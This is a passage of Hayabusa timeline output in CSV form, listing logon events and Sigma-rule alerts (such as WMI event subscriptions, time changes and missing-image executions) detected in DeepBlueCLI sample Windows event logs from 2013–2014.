memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:53:46.263 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x15f53a,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:53:46.669 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser : LogonID: 0x15f546,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:53:46.669 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser : LogonID: 0x15f53a,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:54:01.732 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x2553c,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:55:02.343 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 06:55:02.343 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 06:55:25.000 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:55:32.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 06:55:35.625 
+09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:55:35.625 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0xdad4 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:55:35.625 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0xdafc : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:55:35.625 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0xdad4,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:55:37.450 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 06:55:37.450 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 06:55:37.450 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:55:44.840 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: 
IE8WIN7$ : Target User: IEUser : IP Address: - : Process: C:\Windows\System32\svchost.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:55:44.840 +09:00,IE8Win7,4624,informational,Logon Type 4 - Batch,User: IEUser : Workstation: IE8WIN7 : IP Address: - : Port: - : LogonID: 0x13dbc,rules/hayabusa/default/events/Security/Logons/4624_LogonType-4-Batch.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:55:44.840 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x13dbc,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:57:51.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 06:57:51.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 07:00:55.356 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0xdafc,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:00:55.903 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser : LogonID: 0xdafc,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:00:55.903 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser : LogonID: 0xdad4,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:01:28.840 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : 
Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:01:28.840 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x4bafc : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:01:28.840 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x4bb14 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:01:28.840 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x4bafc,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:04:16.809 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x4bb14,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:05:00.218 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 07:05:00.218 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 07:05:21.859 +09:00,IE8Win7,4624,informational,Logon Type 0 - 
System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:05:31.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 07:05:32.609 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:05:32.609 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0xd99e : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:05:32.609 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0xd9c6 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:05:32.609 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0xd99e,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:05:36.944 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 07:05:36.944 +09:00,IE8Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 07:05:36.944 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:05:40.928 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: - : Process: C:\Windows\System32\svchost.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:05:40.928 +09:00,IE8Win7,4624,informational,Logon Type 4 - Batch,User: IEUser : Workstation: IE8WIN7 : IP Address: - : Port: - : LogonID: 0x144df,rules/hayabusa/default/events/Security/Logons/4624_LogonType-4-Batch.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:05:40.928 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x144df,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:08:00.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 07:08:00.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 07:10:10.631 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 08:11:15.779 +09:00,IE8Win7,1,high,Execution Of Not Existing 
File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 08:11:15.779 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 08:11:15.779 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:29:47.424 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:29:47.424 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:29:47.424 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:29:47.424 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:29:47.424 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:29:47.424 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:29:47.424 +09:00,IE8Win7,4616,medium,Unauthorized System Time 
Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:29:47.517 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:30:12.392 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:30:12.392 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:32:12.657 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser : LogonID: 0x144df,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:34:00.063 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IEUser : Target User: rdavis : IP Address: - : Process: : Target Server: HYPERV.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:40:48.532 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0xd9c6,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:42:11.390 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:42:11.390 +09:00,IE8Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:42:34.625 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:42:43.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-22 08:42:49.610 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:42:49.610 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:42:49.610 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:43:06.625 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:43:06.625 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x16559 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:43:06.625 +09:00,IE8Win7,4624,informational,Logon Type 2 - 
Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x16589 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:43:06.625 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x16559,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:44:23.818 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:44:23.818 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:44:23.849 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:45:01.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-22 08:45:01.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-22 08:45:09.380 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:45:09.380 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:45:09.380 
+09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 09:34:55.380 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 09:37:57.755 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 09:44:32.677 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x16589,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 09:53:07.927 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 10:07:45.896 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 10:13:36.380 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 10:21:57.052 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 10:36:35.927 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 10:38:16.943 +09:00,IE8Win7,21,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:07:11.015 +09:00,IE8Win7,1,high,Execution Of Not Existing 
File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:07:11.015 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:07:26.562 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-24 14:07:38.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-24 14:07:42.189 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:07:42.189 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:07:42.189 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-24 14:08:08.126 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-24 14:08:08.126 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x2b7c0 : (Warning: Credentials are stored in 
memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-24 14:08:08.126 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x2b7f0 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-24 14:08:08.126 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x2b7c0,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-24 14:09:50.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-24 14:09:50.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-24 14:11:00.564 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:00.564 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 
14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event 
